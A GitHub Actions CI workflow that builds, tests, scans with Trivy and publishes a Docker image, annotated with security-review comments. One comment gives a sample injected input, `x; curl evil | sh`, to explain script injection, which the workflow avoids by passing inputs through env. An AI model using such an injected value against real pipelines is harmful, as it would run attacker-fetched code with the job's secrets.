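---
name: Example CI

# Least-privilege token for every job: nothing in this workflow writes to the
# repository, and actions/checkout only needs read access.
permissions:
  contents: read

on:  # yamllint disable-line rule:truthy
  workflow_dispatch:
    inputs:
      # These inputs are caller-controlled. Below they reach shell steps only
      # through `env:` and are quoted as "$VAR"; they are never interpolated
      # with `${{ }}` inside a `run:` script, where a value such as
      # `x; curl evil | sh` would be executed as a command (script injection).
      image-name:
        description: "Name for image"
        default: "gitea.cuihang1201.synology.me/hangpersonal/ci-test"
        type: string
        required: true
      image-tag:
        description: "Tag for image"
        default: "latest"
        type: string
        required: true
      container-name:
        description: "Name for container"
        default: "ci-test"
        type: string
        required: true

jobs:
  # NOTE(review): every `uses:` is pinned to a mutable major tag (@v3, @v4,
  # @v5). A re-pointed tag runs arbitrary code with the job's token and
  # secrets; pin each action to a full commit SHA and let a bot bump it.
  lint:
    runs-on: ubuntu-22.04
    steps:
      - name: Checkout source code
        uses: actions/checkout@v4
      - name: Install Python 3.10.12
        uses: actions/setup-python@v4
        with:
          python-version: '3.10.12'
      - name: Install tox
        run: pip install tox
      - name: Run lint
        run: |
          cd backend
          tox -e lint

  unit-test:
    runs-on: ubuntu-22.04
    steps:
      - name: Checkout source code
        uses: actions/checkout@v4
      - name: Install Python 3.10.12
        uses: actions/setup-python@v4
        with:
          python-version: '3.10.12'
      - name: Install tox
        run: pip install tox
      - name: Run unit tests
        run: |
          cd backend
          tox -e unit

  build-image:
    runs-on: ubuntu-22.04
    needs: [lint, unit-test]  # build only after lint and unit tests pass
    steps:
      - name: Checkout source code
        uses: actions/checkout@v4
      - name: Set up Docker Buildx
        uses: docker/setup-buildx-action@v3
      - name: Build and export
        uses: docker/build-push-action@v5  # build the image from backend/Dockerfile
        with:
          context: backend  # directory of the Dockerfile
          # `with:` values are passed to the action as data, not expanded by a
          # shell, so using the inputs here is safe.
          tags: ${{ inputs.image-name }}:${{ inputs.image-tag }}
          # Export to a tar instead of pushing; downstream jobs load it from
          # the artifact so the scanned image is the one that gets published.
          outputs: type=docker,dest=/tmp/image.tar
      - name: Upload artifact
        uses: actions/upload-artifact@v3
        with:
          name: image
          path: /tmp/image.tar

  integration-tests:
    runs-on: ubuntu-22.04
    needs: [build-image]
    steps:
      - name: Download artifact
        uses: actions/download-artifact@v3
        with:
          name: image
          path: /tmp
      - name: Load image
        # Inputs are handed to the shell as environment variables; `${{ }}`
        # inside `run:` is substituted before the shell parses the script.
        env:
          IMAGE_NAME: ${{ inputs.image-name }}
          IMAGE_TAG: ${{ inputs.image-tag }}
          CONTAINER_NAME: ${{ inputs.container-name }}
          # NOTE(review): repository variable; presumably the runner's loopback
          # address -- confirm, the smoke test below depends on it.
          TARGET_HOST: ${{ vars.LOCALHOST }}
        run: |
          set -euo pipefail
          docker load --input /tmp/image.tar
          docker image ls -a
          # Stop the container on every exit path, including a failed smoke
          # test, so a stale container holding the name or port 8143 cannot
          # break the next run on a persistent (self-hosted) runner.
          trap 'echo "Stop container: "; docker container stop "$CONTAINER_NAME" || true' EXIT
          docker run --rm -p 8143:80 --name "$CONTAINER_NAME" -d "$IMAGE_NAME:$IMAGE_TAG"
          sleep 5
          # -f turns an HTTP error status into a non-zero exit; without it only
          # a connection failure fails the step and a 500 page passes the gate.
          curl -sf "http://${TARGET_HOST}:8143/" ; echo

  vulnerability-scan:
    runs-on: ubuntu-22.04
    needs: [build-image]
    steps:
      - name: Download artifact
        uses: actions/download-artifact@v3
        with:
          name: image
          path: /tmp
      # Trivy CLI install (no Docker needed).
      # The installer is fetched from the release tag it installs rather than
      # from `main`, so a later edit to the script cannot silently change what
      # runs here. It is still a curl | sh with no checksum; for a stronger
      # guarantee download the release archive and verify its published
      # checksum, or use a SHA-pinned aquasecurity/trivy-action.
      - name: Install Trivy CLI
        env:
          TRIVY_VERSION: v0.65.0
        run: |
          set -euo pipefail
          curl -sfL "https://raw.githubusercontent.com/aquasecurity/trivy/${TRIVY_VERSION}/contrib/install.sh" \
            | sh -s -- -b /usr/local/bin "${TRIVY_VERSION}"
          trivy --version
      # IMPORTANT: the tar sits under /tmp/image.tar
      - name: Scan saved image tar with Trivy (no daemon)
        run: |
          set -euo pipefail
          ls -la /tmp || true
          # --exit-code 1 is what makes this job a real gate: without it Trivy
          # exits 0 whatever it finds, and publish-image (which `needs` this
          # job) would always run.
          # --ignore-unfixed hides findings with no fix yet; they are still
          # real exposure, so review the JSON report, not only the job status.
          trivy image \
            --input /tmp/image.tar \
            --format json \
            --output /tmp/trivy-results.json \
            --severity CRITICAL,HIGH \
            --ignore-unfixed \
            --exit-code 1
      - name: Upload results
        if: always()  # keep the report even when the scan fails the job
        uses: actions/upload-artifact@v3
        with:
          name: trivy-results
          path: /tmp/trivy-results.json

  publish-image:
    runs-on: ubuntu-22.04
    needs: [integration-tests, vulnerability-scan]
    steps:
      - name: Download artifact
        uses: actions/download-artifact@v3
        with:
          name: image
          path: /tmp
      - name: Load image
        run: |
          docker load --input /tmp/image.tar
          docker image ls -a
      # NOTE(review): docker/login-action targets Docker Hub unless `registry:`
      # is set. The default image-name points at a Gitea registry; if
      # vars.IMAGE does too, add `registry: <host>` here, otherwise the push
      # below is not authenticated against that host.
      - name: Login to DockerHub
        uses: docker/login-action@v3
        with:
          username: ${{ secrets.REGISTRY_USER }}
          password: ${{ secrets.REGISTRY_TOKEN }}
      - name: Docker push image to DockerHub
        env:
          BUILT_IMAGE: ${{ inputs.image-name }}:${{ inputs.image-tag }}
          PUBLISH_IMAGE: ${{ vars.IMAGE }}:${{ inputs.image-tag }}
        run: |
          set -euo pipefail
          # The loaded tar carries the tag given in build-image
          # (inputs.image-name), but the push target is vars.IMAGE. Re-tag so
          # the two cannot drift; when they are already equal this is a no-op.
          docker tag "$BUILT_IMAGE" "$PUBLISH_IMAGE"
          docker push "$PUBLISH_IMAGE"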